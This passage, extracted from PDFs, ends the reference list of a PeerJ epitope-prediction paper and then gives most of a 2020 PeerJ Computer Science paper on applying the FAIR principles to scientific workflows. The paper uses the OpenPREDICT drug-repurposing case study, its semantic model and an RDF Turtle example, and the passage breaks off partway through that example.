2019. Under-sampling class imbalanced datasets by combining clustering analysis and instance selection. Information Sciences 477:47–54 DOI 10.1016/j.ins.2018.10.029. Yen S, Lee Y. 2009. Expert systems with applications cluster-based under-sampling approaches for imbalanced data distributions. Expert Systems with Applications 36:5718–5727 DOI 10.1016/j.eswa.2008.06.108. Zhang J, Zhao X, Sun P, Gao B, Ma Z. 2014. Conformational B-cell epitopes prediction from sequences using cost-sensitive ensemble classifiers and spatial clustering. BioMed Research International 2014:1–12 DOI 10.1155/2014/689219. Zhang W, Xiong Y, Zhao M, Zou H, Ye X, Liu J. 2011. Prediction of conformational B- cell epitopes from 3D structures by random forests with a distance-based feature. BMC Bioinformatics 12(341):1–10 DOI 10.1186/1471-2105-12-341. Zhao L, Hoi SCH, Li Z, Wong L, Nguyen H, Li J. 2014. Coupling graphs, efficient algorithms and B-cell epitope prediction. IEEE/ACM Transactions on Computational Biology and Bioinformatics 11(1):7–16 DOI 10.1109/TCBB.2013.136. Zhao L, Wong L, Lu L, Hoi SCH, Li J. 2012. B-cell epitope prediction through a graph model. BMC Bioinformatics 13((Sup 17)(S20)):1–12. Zheng W, Ruan J, Hu G, Wang K, Hanlon M, Gao J. 2015. Analysis of conformational B-Cell epitopes in the antibody-antigen complex using the depth function and the convex hull. PLOS ONE 10(8):1–16 DOI 10.1371/journal.pone.0134835. Zhou C, Chen Z, Zhang L, Zhang L, Yan D, Mao T, Tang K, Qiu T, Cao Z. 2019. SEPPA 3.0—enhanced spatial epitope prediction enabling glycoprotein antigens. Nucleic Acids Research 47(May):388–394 DOI 10.1093/nar/gkz413. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 17/17 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0080635 http://dx.doi.org/10.1016/j.ins.2018.10.029 http://dx.doi.org/10.1016/j.eswa.2008.06.108 http://dx.doi.org/10.1155/2014/689219 http://dx.doi.org/10.1186/1471-2105-12-341 http://dx.doi.org/10.1109/TCBB.2013.136 http://dx.doi.org/10.1371/journal.pone.0134835 http://dx.doi.org/10.1093/nar/gkz413 http://dx.doi.org/10.7717/peerj-cs.275 work_hqes4liwkjbipfnjiwg72ck2oe ---- Submitted 13 November 2019 Accepted 18 June 2020 Published 21 September 2020 Corresponding authors Remzi Celebi, remzi.celebi@maastrichtuniversity.nl Joao Rebelo Moreira, j.luizrebelomoreira@utwente.nl Academic editor Silvio Peroni Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.281 Copyright 2020 Celebi et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Towards FAIR protocols and workflows: the OpenPREDICT use case Remzi Celebi1,*, Joao Rebelo Moreira2,*, Ahmed A. Hassan3, Sandeep Ayyar4, Lars Ridder5, Tobias Kuhn2 and Michel Dumontier1 1 Institute of Data Science, Maastricht University, Maastricht, Netherlands 2 Computer Science, VU University Amsterdam, Amsterdam, Netherlands 3 Pharmacology & Personalised Medicine, Maastricht University, Maastricht, Netherlands 4 Medical Informatics, Stanford University, Palo Alto, CA, United States of America 5 Netherlands eScience Center, Amsterdam, Netherlands * These authors contributed equally to this work. ABSTRACT It is essential for the advancement of science that researchers share, reuse and reproduce each other’s workflows and protocols. The FAIR principles are a set of guidelines that aim to maximize the value and usefulness of research data, and emphasize the importance of making digital objects findable and reusable by others. The question of how to apply these principles not just to data but also to the workflows and protocols that consume and produce them is still under debate and poses a number of challenges. In this paper we describe a two-fold approach of simultaneously applying the FAIR principles to scientific workflows as well as the involved data. We apply and evaluate our approach on the case of the PREDICT workflow, a highly cited drug repurposing workflow. This includes FAIRification of the involved datasets, as well as applying semantic technologies to represent and store data about the detailed versions of the general protocol, of the concrete workflow instructions, and of their execution traces. We propose a semantic model to address these specific requirements and was evaluated by answering competency questions. This semantic model consists of classes and relations from a number of existing ontologies, including Workflow4ever, PROV, EDAM, and BPMN. This allowed us then to formulate and answer new kinds of competency questions. Our evaluation shows the high degree to which our FAIRified OpenPREDICT workflow now adheres to the FAIR principles and the practicality and usefulness of being able to answer our new competency questions. Subjects Bioinformatics, Data Science, World Wide Web and Web Science, Software Engineering Keywords Ontology-driven healthcare, FAIR workflows, Drug repurposing, Scientific workflows and protocols, Reproducibility, Semantic web, Research Object, FAIR data principles INTRODUCTION Reproducible results are one of the main goals of science. A recent survey, however, showed that more than 70% of researchers have been unsuccessful in reproducing another research experiment and more than 50% failed to reproduce their own research studies (Baker, 2016). The rate of non-reproducibility for pharmacological studies is particularly worrying. Together with their high costs and their high rate of failure (around 90%), this highlights How to cite this article Celebi R, Rebelo Moreira J, Hassan AA, Ayyar S, Ridder L, Kuhn T, Dumontier M. 2020. Towards FAIR protocols and workflows: the OpenPREDICT use case. PeerJ Comput. Sci. 6:e281 http://doi.org/10.7717/peerj-cs.281 https://peerj.com/computer-science mailto:remzi.celebi@maastrichtuniversity.nl mailto:j.luizrebelomoreira@utwente.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.281 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.281 the need for new approaches in drug discovery (Scannell et al., 2012). For these reasons, we chose pharmacology as the field to apply and test the approach we will introduce below. Specifically, we will be looking into drug repositioning, where small molecules approved for one indication are repurposed for a new indication. Drug repositioning is gaining recognition as a safe, effective and lower-cost approach to uncover new drug uses (Ashburn & Thor, 2004; Sleigh & Barton, 2010). The availability of public data, both in the form of literature curated knowledge and omics data has created exciting opportunities for computational drug repositioning. For instance, gene expression data in repositories such as the Gene Expression Omnibus (GEO) enable the analysis of correlations between drug and gene expression - termed the Connectivity Map approach - to find chemicals that may counter cellular disorders (Barrett & Edgar, 2006), including Alzheimer’s, and small cell lung cancer (Lamb et al., 2006; Sirota et al., 2011). More sophisticated approaches use network analysis and machine learning to efficiently combine drug and disease data (Cheng et al., 2012; Gottlieb et al., 2011; Hoehndorf et al., 2013; Wu et al., 2013; Bisgin et al., 2014). The ability to reproduce original research results is contingent on the availability of the original data, methods and results. The FAIR principles (Wilkinson et al., 2016), describe a set of requirements for data management and stewardship to make research data Findable, Accessible, Interoperable, and Reusable. Ongoing efforts on FAIR cover data policies, data management plans, identifier mechanisms, standards and data repositories (Collins et al., 2018). Highly diverse communities, from the biomedical sciences to the social sciences and humanities, are now working towards defining standards for publication and sharing of data. In anticipation, new methods and infrastructure are needed to facilitate the generation of FAIR data and workflows. Here, we describe a methodology to publish scientific workflows as FAIR data. We are using the term workflow here to include computational steps implemented in software but also manual steps, such as manual data cleaning steps or wet-lab activities. We evaluate our method by applying it to the PREDICT drug repositioning workflow. Based on this example, we will try to answer our research question of how we can use existing vocabularies and techniques to make scientific workflows more open and FAIR, with a particular focus on the interoperability aspect. The main contributions of this paper are (a) general guidelines to make scientific workflows open and FAIR, focusing on the interoperability aspect, (b) the OpenPREDICT use case, demonstrating the open and FAIR version of the PREDICT workflow, (c) new competency questions for previously unaddressed reproducibility requirements, and (d) evaluation results on the practicality and usefulness of our approach. BACKGROUND Below, we refer to the most relevant background with respect to reproducibility, workflow systems, and applying FAIR to workflows. Scientific Workflows and Reproducibility According to the Descriptive Ontology for Linguistic and Cognitive Engineering (DOLCE) (Borgo & Masolo, 2010), a workflow is a ’’plan that defines role(s), task(s), and a Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 2/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 specific structure for tasks to be executed, usually supporting the work of an organization’’, and a plan is a description of instructions with an explicit goal. A scientific workflow, therefore, is such a plan that implements scientific methods to work towards the general goal of scientific knowledge gathering and organization. Certain scientific workflows can be automated through workflow systems, which are software systems that enable the representation and execution of structured tasks. The lack of relevant details in the published descriptions of scientific workflows (Vasilevsky et al., 2013) is an important factor contributing to the non-reproducibility rates of 64% in pharmacology (Ioannidis, 2005a; Prinz, Schlange & Asadullah, 2011), 89% in cancer research (Begley & Ellis, 2012), and 66% in psychology (Klein et al., 2014). A recent analysis of over 1.4 million Jupyter notebooks (available in GitHub) found that only 24.11% of the notebooks could be executed without errors and only 4.03% produced the same results (Pimentel et al., 2019). As a consequence, it has been reported that data scientists spend 19% of their time finding, understanding and accessing datasets, and 60% of their time cleaning and organizing these datasets to use in their studies (CrowdFlower, 2016). Thus, only 20% of the time is left for data scientists to spend on their core activities, such as mining data, refining algorithms, building training sets and analyzing the results. Workflow systems To tackle the workflow decay phenomenon (Hettne et al., 2012), a number of recent initiatives are targeting the improvement of the reproducibility of computational workflows for example the Common Workflow Language (CWL) (https://www.commonwl.org/) and the Workflow Description Language (WDL) (https://openwdl.org/), which have become the de facto standard for syntactic interoperability of workflow management systems. CWL and WDL are aimed to exchange and run computational workflows reproducibly in different environments. They are designed to separate the workflow description from its execution. In order to improve semantic interoperability and connect workflows to real-world entities in a systematic way, additions of semantic models and methods have been proposed, for example the Workflow4ever project with its Research Objects method (Belhajjame et al., 2015). Provenance is an important aspect of workflows, which can be classified into prospective provenance, retrospective provenance, and workflow evolution provenance. Prospective provenance refers to the specifications or ‘‘recipes’’ that describe the workflow steps and their execution order, typically as an abstract representation of these steps (protocols), as well as expected inputs and outputs (Cohen-Boulakia et al., 2017). Retrospective provenance refers to the information about actual workflow executions that happened in the past, including the concrete activities that consumed inputs and produced outputs, as well as information about the execution environment (Khan et al., 2019). Workflow evolution provenance refers to tracking the versions of workflow specifications and the respective data, as the workflow specification is changed and improved over time. A number of models and methods have been developed to capture these different kinds of provenance. The PROV ontology (Lebo et al., 2013) provides the vocabulary and model for provenance in general, which can be used in conjunction with top-level ontologies such Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 3/29 https://peerj.com https://www.commonwl.org/ https://openwdl.org/ http://dx.doi.org/10.7717/peerj-cs.281 as DOLCE (Borgo & Masolo, 2010) and other general vocabularies such as Dublin Core and schema.org. Several approaches have been proposed to apply PROV to workflows, such as the Open Provenance Model for Workflows (OPMW) (Moreau et al., 2008), P-PLAN (Garijo & Gil, 2012), and CWLProv (Soiland-Reyes et al., 2018). Other notable examples include ProvBook and the Reproduce-me ontology (Samuel & König-Ries, 2018a; Samuel & König-Ries, 2018b) for workflows in Jupyter notebooks, the ML-Schema ontology for machine learning workflows (Correa Publio et al., 2018), the Publishing Workflow Ontology (PWO) for workflows in scientific publications (Hartanto, Sarno & Ariyani, 2017), and the Business Process Modelling Notation (BPMN) to specify business processes (Rospocher, Ghidini & Serafini, 2014). Other approaches, such as SMART protocols (Giraldo et al., 2017) and protocols.io, target the description of laboratory protocols. Applying FAIR to workflows The FAIR principles have received significant attention, but we currently lack overarching approaches to align them with scientific protocols and workflows in a broad sense. Making a workflow FAIR-compliant entails that general-purpose software can interpret it and understand its context. The application of FAIR in healthcare, for example, has shown that these principles boost data-driven applications that require the integration of data coming from different sources, achieving ‘‘interoperability without the need to all speak exactly the same language’’ (Imming et al., 2018). Recent initiatives have outlined how FAIR can be applied to software (Neil & Daniel, 2018; Lamprecht et al., 2019), contributing towards the goal of applying FAIR not just to input and output data, but to the entire process in between, in order to solve the current problem that even human experts are often unable to reconstruct the specific steps and parameters of a workflow from what is published in scientific articles (Vasilevsky et al., 2013). The FAIRification Jacobsen et al. (2019) consists of a number of steps required to transform an existing data element to its FAIR version, typically leveraging the RDF technology for the interoperability aspect. RDF is a broadly applicable formal language to achieve the semantic interoperability principle I1. FAIRification starts by retrieving the non-FAIR data from its sources. Subsequently these datasets are analyzed to understand the data structures and how they are mapped to concepts from the domain. The next step, semantic modelling, is a major activity comprising semantic harmonisation and integration, requiring the reuse and/or creation of models compliant with the FAIR principles. Once the dataset is aligned with semantic definitions, it can be expressed in RDF and augmented with metadata. The last step is to store the FAIRified data into a findable and accessible manner. THE FAIR WORKFLOWS APPROACH In this section we describe our workflow representation requirements, with a special focus on the coverage of manual steps, different workflow abstraction levels, and versioning on all these levels. We formulate these requirements as competency questions and present a Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 4/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 configuration of elements from existing semantic models as a unified model to answer these competency questions. Requirements and Competency Questions With the help of structured interviews with data scientists and a gap analysis of the literature, we formulated user requirements for the reproducibility of workflows (the details of the interviews are given in Appendix S1). The interviewees stated that they experience many challenges in reproducing their or others’ work, due to the lack of details of workflow steps, data cleaning and filtering. Also essential information, such as processing parameters or design details needed to reproduce the results, is often missing. Some of these requirements are already covered by existing approaches while others have not been addressed so far. The interviews indicated that the definitions of manual processes of workflows are usually missing or incomplete, which is a requirement poorly addressed by computational workflow approaches. Often, software libraries, packages and versions of tools used are not explicitly recorded. The interviewees suggested making metadata of the datasets accessible, add richer prospective and retrospective provenance and allowing for fine-grained workflow versioning linked to outputs produced during distinct executions. A unanimous recommendation was to allow for the separate input of relevant workflow parameters, so that one can run the same workflow multiple times with different processing options without having to change the workflow itself. The representation of software environment details (e.g., the used libraries and packages) is already addressed by some of the surveyed semantic models, like Workflow4ever, CWLProv and Reproduce-me. We checked the capabilities of the existing semantic approaches to address the needs collected from the interviews. We concluded that none of the related work could completely address all the requirements together. The missing parts can be put in three main categories: (CQ1) Manual steps description and executions; (CQ2) abstraction levels of workflows; and (CQ3) versioning of executed workflows. Therefore, we propose the following additional sets of competency questions (CQ) to cover these missing parts: The first group of questions (CQ1) is about manual steps: CQ1.1 Which steps are meant to be executed manually and which to be executed computationally? CQ1.2 For the manual steps, who are the agents responsible to execute them (individuals and roles)? CQ1.3 Which datasets were manually handled and their respective formats? CQ1.4 What are the types of manual steps involved? The second group (CQ2) is about instantiation of general workflows by more specific ones: CQ2.1 What are the main steps of a general workflow? CQ2.2 What are the steps of a specific workflow and how are they described? Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 5/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281#supp-1 http://dx.doi.org/10.7717/peerj-cs.281 Figure 1 Unified semantic model for workflows. Full-size DOI: 10.7717/peerjcs.281/fig-1 CQ2.3 What higher-level description instantiated a certain workflow step? CQ2.4 Who or what method made the instantiation of a semantic/meta level description of a step into an executable workflow step? The third group (CQ3) are questions about versioning of workflows and their executions: CQ3.1 What are the existing versions of a workflow and what are their provenances? CQ3.2 Which instructions were removed/changed/added from one version to another? CQ3.3 Which steps were automatized from one version to another? CQ3.4 Which datasets were removed/changed/added for the different versions? CQ3.5 Which workflow version was used in each execution and what was generated? To the best of our knowledge, none of the previous research on semantic modelling of workflows (or protocols/processes) addresses all these requirements together. In few cases some semantic models only partially cover some questions, as explained in the prior section. Unified model From the study of the diverse existing semantic models for workflows and protocols, we compiled a unified conceptual model covering the elements required to answer our competency questions. For this, we applied the ontology-driven conceptual modelling approach (Guizzardi et al., 2015), which is based on the Unified Foundational Ontology (UFO) and its ontological language OntoUML (Moreira et al., 2016). Figure 1 illustrates the main elements of our unified model (https://w3id.org/fair/plex), which is primarily based on DOLCE Ultra Lite (DUL), PROV, P-PLAN and BPMN 2.0. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 6/29 https://peerj.com https://doi.org/10.7717/peerjcs.281/fig-1 https://w3id.org/fair/plex http://dx.doi.org/10.7717/peerj-cs.281 The most relevant ontology used is P-PLAN, which provides an abstract terminology of the main building blocks to describe plans. The p-plan:Plan category is the core element of our unified model and is the class used to classify any type of instruction. It allows for the composition of instruction by means of smaller steps (p-plan:Step) that have input and output variables (p-plan:Variable). With the pwo:hasFirstStep property, we can indicate the first step of a plan, and with dul:precedes, we can indicate whenever a step precedes another, thereby enabling the representation of sequential and parallel steps. We decouple a particular step within a workflow from its instruction with the pattern p-plan:Step dul:isDescribedBy p-plan:Plan, where each step always points to one plan. This approach allows us to separate the workflow steps, enabling the reuse of instructions by different workflows. Therefore, in our approach a step is a lightweight object (like a pointer) that serves only for ordering of instructions without coupling them to the specific workflow. Besides that, we use the dul:isDescribedBy property as a self-relationship of p-plan:Plan, to represent that an instruction describes another instruction in a different abstraction level. With this approach, we can represent anything from high-level abstract protocols to concrete and executable workflow steps, and the links between these levels. This can be used to first represent the general protocol and then move to the definition of the executable steps akin to the common software engineering phases of specification and implementation. Our model can however also be used in the other direction to extract a new common protocol from similar existing concrete workflows. At the more abstract levels, instructions are written in a natural language like English (or possibly pseudo-code), whereas at the lowest level, we find the executable specifications, which can be written in a programming language and thereby automatically executable. Alternatively, at the lowest level instructions can be in natural language, such as for wet-lab instructions, which can naturally only be executed in a manual fashion. For example, the first general step of a specification of a machine learning pipeline like OpenPREDICT (to which we will come back to shortly) might be to ‘‘load all features and gold standard’’ (a p-plan:Plan). The concrete execution of this general step is described by four concrete and executable steps (written in a language such as Python), each having a link (dul:isDescribedBy) to the general description of the step. We use the BPMN 2.0 ontology for the representation of manual and computational activities with bpmn:ManualTask and bpmn:ScriptTask, which we both define as subclasses of p-plan:Step. With this approach, the modeller can therefore include manual and automated steps in the same workflow. More specific classes can be used for particular workflow systems, such as reprod:Cell as a kind of bpmn:ScriptTask describing a code cell in a Jupyter Notebook. We follow the FAIR Data Point specification (https://github.com/FAIRDataTeam/ FAIRDataPoint-Spec) for the representation of datasets (input and output) through the dcat:Dataset element, which should be linked to the available distributions (dcat:Distribution) through the dcat:distribution property, and the URL to download the distribution is represented with dcat:downloadURL. We improved this approach with data formats from the EDAM ontology through the dcat:mediaType property. We use Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 7/29 https://peerj.com https://github.com/FAIRDataTeam/FAIRDataPoint-Spec https://github.com/FAIRDataTeam/FAIRDataPoint-Spec http://dx.doi.org/10.7717/peerj-cs.281 prov:qualifiedUsage for variable bindings. For example, the instruction (p-plan:Plan) to ‘‘download a dataset and save it in the local environment’’ has a link (prov:qualifiedUsage) to the ‘‘binding the online dataset to a local variable’’ (prov:Usage), which represents the connection between the dataset distribution (dcat:Distribution) and the local variable (p-plan:Variable) through instances of the prov:entity properties. For the representation of retrospective provenance, i.e., information about prior executions of a workflow, we follow the P-PLAN approach by using p-plan:Activity and linking it to the steps with p-plan:correspondsToStep. To represent the roles of the different involved agents (such as people and software), we use the agent associations as defined in PROV. For example, the Jupyter Notebook (prov:SoftwareAgent) was used as execution environment (prov:Role) for all computational steps of the OpenPREDICT workflow. Furthermore, as a practical design decision, we extended the notion of prov:Association for endurants, so the modeller can apply the association pattern similarly to the perdurant way, i.e., use the property prov:hadPlan from p-plan:Association to p-plan:Plan instead of the relation from prov:Activity through prov:qualifiedAssociation. Therefore, this approach allows the modeller to represent the association of agent roles to an instruction. For example, Remzi is the OpenPREDICT main developer, so the ‘‘Remzi as developer of OpenPREDICT’’ (prov:Association) links to (a) the ‘‘Developer’’ (prov:Role) through prov:hadRole property, (b) the Remzi object (a prov:Agent) through prov:agent; and (c) all OpePREDICT instructions (p-plan:Plan), through prov:hadPlan. Notice that, although the terminology of these properties targeted the perdurant aspect (prov:Activity), these properties are also useful for the endurant aspect. Ideally, they should have the adequate endurant terminology, so instead of prov:hadPlan, it should be ‘‘prov:hasPlan’’ (similarly for prov:hadRole too). One of the most important links is the one between a workflow execution and its created outputs. For this, we specialized the PROV approach by using prov:generated to link a workflow activity (p-plan:Activity) to an output artefacts (opmw:WorkflowExecutionArtifact). Therefore, each step execution can generate workflow execution artifacts. To represent the specifics of machine learning workflows, we moreover use the ML-Schema ontology (mls), such as to specify the trained model and its evaluation measures (via mls:ModelEvaluation and mls:EvaluationMeasure). For example, it can be used to specify the accuracy of the models that were trained during different executions. For the representation of versioning, finally, we use dc:hasVersion to assign version identifiers and prov:wasRevisionOf to link to the previous versions, and apply this to all relevant elements, including workflows, instructions, software, and datasets. Case study topic We evaluate our approach below with a case study of a computational drug repurposing method based on machine learning, called PREDICT (Gottlieb et al., 2011). PREDICT is one of the most frequently cited drug repurposing methods and provides a ranking of drug-disease associations on the basis of their similarity to a set of known associations. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 8/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 PREDICT has reported a high AUC (0.90) for predicting drug indications, though neither the original data nor the software to produce the results are available. The features for the drug prediction classifier included five drug–drug similarity measures and two disease–disease similarity measures. The similarities between drugs were calculated based on molecular fingerprints, common side effects of drugs, target protein sequence alignment, semantic similarity of target genes of drugs in the Gene Ontology, and closeness of target proteins in human protein–protein interaction network. For the disease aspect, two disease–disease similarities were calculated based on medical description of diseases and semantic similarity of disease terms in the Human Phenotype Ontology. The method transforms drug–drug and disease–disease similarities into integrated features to be used for a logistic regression training. For evaluating the performance of the logistic regression, 10-fold cross-validation was used in two different ways: one in which 10% of drugs are hidden and one in which 10% of associations are hidden. In the first strategy, 10% randomly selected drugs in the gold standard and the known indications associated with them were removed. The positive training set consisted of the remaining 90% of drugs and the indications associated with them. The negative training set consisted of randomly generated drug-disease associations which were not in the positive set. For the second strategy, the known associations were divided into 90% positive training and 10% positive test sets, while negative training and test sets were built using randomly generated drug-disease associations from respective sets. In the next section, we report on the application of our approach to this use case. OPENPREDICT CASE STUDY As case study, we took the original PREDICT workflow, as introduced above, and transformed it with our approach to make it open and FAIR. We therefore call the resulting workflow OpenPREDICT. It implements the same steps of the original PREDICT, i.e., five drug–drug similarity and two disease–disease similarity measures were used to train a logistic regression classifier to predict potential drug-disease association (see Fig. 2). Therefore, we follow the same general protocol of these four steps: 1. Data preparation: In this step, the necessary dataset is collected and preprocessed. 2. Feature Generation: In this step, we generate features from the collected data sets. Drug-drug and disease-disease similarity scores were combined by computing the weighted geometric mean. Thus, we combine five drug-drug similarity measures and two disease-disease similarity measures, resulting in 10 features. 3. Model Training: In this step, the generated features from the previous step are to be used to train in a simple logistic classifier. 4. Model Evaluation: This step uses two different cross-validation approaches: one where 10% of drugs is hidden and one where 10 % of associations is hidden for testing. ROC AUC, AUPR, accuracy, precision and F-score of the classifier on test data are reported. Below we explain how we made a FAIR version of PREDICT’s input data and then show how we used our approach to model the OpenPREDICT workflow that is consuming this Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 9/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 Figure 2 OpenPREDICT Workflow (version 0.1) with manual and computational steps. Full-size DOI: 10.7717/peerjcs.281/fig-2 data. The implementation and the workflow description of OpenPREDICT are available on GitHub (https://github.com/fair-workflows/openpredict). FAIRified data collection Since the original data used in PREDICT is not publicly available, we collected data from open sources and made it FAIR with Linked Data (Bizer, Heath & Berners-Lee, 2009) representations. We obtained data about drugs, drug targets, drug chemical structure, and drug target sequence from DrugBank (Wishart et al., 2008), and additional drug targets from the KEGG dataset (Kanehisa et al., 2007). The SIDER dataset (Kuhn et al., 2010) was used for drug side effects and the HGNC and the GOA datasets (Gray et al., 2015; Barrell et al., 2009) were used for gene identifier mapping and gene ontology (GO) annotation respectively. We used Linked Data versions of the above-mentioned datasets from Bio2RDF (Callahan, Cruz-Toledo & Dumontier, 2013), which is an influential resource for the biomedical sciences, providing a network of data collected from several major biological databases. On to of that, we used the supplementary file provided by Menche et al. (2015) for protein–protein interactions and disease phenotype annotations that link HPO terms to OMIM diseases (https://hpo.jax.org/app/download/annotation). MeSH annotations were collected from (Caniza, Romero & Paccanaro, 2015) (https: //paccanarolab.org/disease_similarity) and annotations were also obtained by NCBO annotator API (Noy et al., 2009) using the OMIM disease description. The data that was not yet in a Linked Data format were converted to RDF with a FAIRification process (Jacobsen et al., 2019). We kept the copies of the retrieved non-RDF datasets in our GitHub repository to prevent the data access issues that may arise if data sources are unavailable. We also stored the collected datasets in a triplestore and created Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 10/29 https://peerj.com https://doi.org/10.7717/peerjcs.281/fig-2 https://github.com/fair-workflows/openpredict https://hpo.jax.org/app/download/annotation https://paccanarolab.org/disease_similarity https://paccanarolab.org/disease_similarity http://dx.doi.org/10.7717/peerj-cs.281 Table 1 All datasets used in OpenPREDICT version v0.1 and v0.2. Dataset file Date retrieved Data format Download URL Bio2RDF r4 datasets (Drugbank, KEGG, HGNC, SIDER and GOA) 2019-08-15 .nq (RDF) com- pressed as .gz https://download.bio2rdf.org/#/release/4/ PREDICT drug in- dication gold stan- dard 2019-08-15 .tab with tabular separator https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3159979/ bin/msb201126-s4.xls Pubchem-Drugbank mappings 2019-08-15 .tab with tabular separator https://raw.githubusercontent.com/dhimmel/drugbank/gh- pages/data/mapping/pubchem.tsv Protein-protein in- teractions 2019-08-15 .txt with tabular sep- arator https://science.sciencemag.org/highwire/filestream/628238/ field_highwire_adjunct_files/1/Datasets_S1-S4.zip HPO Phenotype an- notations 2019-08-15 .tab with tabular separator http://compbio.charite.de/jenkins/job/hpo.annotations/ lastSuccessfulBuild/artifact/misc/phenotype_annotation.tab †MESH Phenotype annotations 2019-08-15 .tab with tabular separator http://www.paccanarolab.org/static_content/disease_ similarity/mim2mesh.tsv MESH Phenotype annotations (Bio- Portal) 2019-08-15 .txt file https://raw.githubusercontent.com/fair- workflows/openpredict/master/data/external/ meshAnnotationsFromBioPorttalUsingOMIMDesc.txt SPARQL queries to access the triplestore in order to produce the features for PREDICT’s method. Our OpenPREDICT workflow has two versions (0.1 and 0.2). In the first, we experimented with the FAIRifier tool with the two inputs that are provided as text files, i.e., (protein–protein interactions in human interactome) and (disease phenotypic descriptions). Besides the formalization of the manual steps through our approach, we also provide guidelines for the manual steps. In the second, we wrote Python scripts for FAIRificiation process of these datasets, evolving most of the manual steps to computational ones. Table 1 summarizes the list of all datasets used in version v0.1 and v0.2. OpenPREDICT v0.2 also uses a different MESH annotation dataset for disease similarity (indicated with † in Table 1) For this FAIRification process, the data needs to be mapped to formal semantic models. In our case, important concepts included ‘‘protein-protein interaction’’ from Bioportal, ‘‘protein interactions’’ from EDAM (edam:topic_0128), the Bio2RDF properties bio2rdf:interactor_a and bio2rdf:interactor_b for the gene interactors representing the role of a gene in a protein–protein interaction, and ‘‘disease’’ and ‘‘has phenotype’’ from SIO (SIO_010299 and SIO_001279). OpenPREDICT workflow representation Figure 2 illustrates the main steps of the OpenPREDICT workflow, in which the main protocol is represented as a dul:Workflow and a p-plan:Plan, with version set through the dc:hasVersion property. The workflow consists of four steps: data preparation, feature generation, model training and evaluation, and presentation of results. Each one is defined Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 11/29 https://peerj.com https://download.bio2rdf.org/#/release/4/ https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3159979/bin/msb201126-s4.xls https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3159979/bin/msb201126-s4.xls https://raw.githubusercontent.com/dhimmel/drugbank/gh-pages/data/mapping/pubchem.tsv https://raw.githubusercontent.com/dhimmel/drugbank/gh-pages/data/mapping/pubchem.tsv https://science.sciencemag.org/highwire/filestream/628238/field_highwire_adjunct_files/1/Datasets_S1-S4.zip https://science.sciencemag.org/highwire/filestream/628238/field_highwire_adjunct_files/1/Datasets_S1-S4.zip http://compbio.charite.de/jenkins/job/hpo.annotations/lastSuccessfulBuild/artifact/misc/phenotype_annotation.tab http://compbio.charite.de/jenkins/job/hpo.annotations/lastSuccessfulBuild/artifact/misc/phenotype_annotation.tab http://www.paccanarolab.org/static_content/disease_similarity/mim2mesh.tsv http://www.paccanarolab.org/static_content/disease_similarity/mim2mesh.tsv https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshAnnotationsFromBioPorttalUsingOMIMDesc.txt https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshAnnotationsFromBioPorttalUsingOMIMDesc.txt https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshAnnotationsFromBioPorttalUsingOMIMDesc.txt http://dx.doi.org/10.7717/peerj-cs.281 by (dul:isDescribedBy) its own p-plan:Plan. In the first version of OpenPREDICT (0.1) all steps within the data preparation were manual (bpmn:ManualTask), as the FAIRification process and the preparation steps on data that were already provided as RDF. The second version of OpenPREDICT (0.2) automated most of these manual steps, requiring less human intervention. We will now go through some of the most important aspects of this representation. Prospective provenance We decoupled the workflow steps from the instructions, linking a p-plan:Step to a p- plan:Variable through p-plan:hasInputVar and p-plan:hasOutputVar, while the p-plan:Plan links to the prov:Usage through the prov:qualifiedUsage property, describing how to bind the variable to other resources. This is an example: opredict:Step_Download_Drugbank_dataset rdf:type bpmn:ManualTask ; rdf:type edam:operation_2409 ; rdf:type p-plan:Step ; p-plan:hasOutputVar opredict:Variable_Drugbank_dataset_online ; p-plan:isStepOfPlan opredict:Plan_Main_Protocol_v01 ; dul:isDescribedBy opredict:Plan_Download_Drugbank_dataset ; dul:precedes opredict:Step_Save_Drugbank_dataset ; rdfs:label "Download Drugbank dataset" ; . opredict:Plan_Download_Drugbank_dataset rdf:type p-plan:Plan ; dc:description "Download Drugbank dataset" ; dc:language :LinguisticSystem_xsd_language_English ; rdfs:label "Download Drugbank dataset" ; prov:qualifiedUsage opredict: Usage_Fetch_download_Drugbank_dataset_to_variable ; . opredict:Usage_Fetch_download_Drugbank_dataset_to_variable rdf:type prov:Usage ; rdfs:label "Link variable to download Drugbank dataset" ; prov:entity opredict:Distribution_release -4-drugbank -drugbank.nq.gz; prov:entity opredict:Variable_Drugbank_dataset_online ; . opredict:Distribution_release -4-drugbank -drugbank.nq.gz rdf:type dcat:Distribution ; rdfs:label "release /4/ drugbank/drugbank.nq.gz" ; dcat:downloadURL "http :// download.bio2rdf.org/files/release /4/ drugbank/ drugbank.nq.gz" ; dcat:mediaType opredict:DataFormat_nq_compressed_gz ; . opredict:Variable_Drugbank_dataset_online rdf:type p-plan:Variable ; rdfs:label "Drugbank dataset online" ; 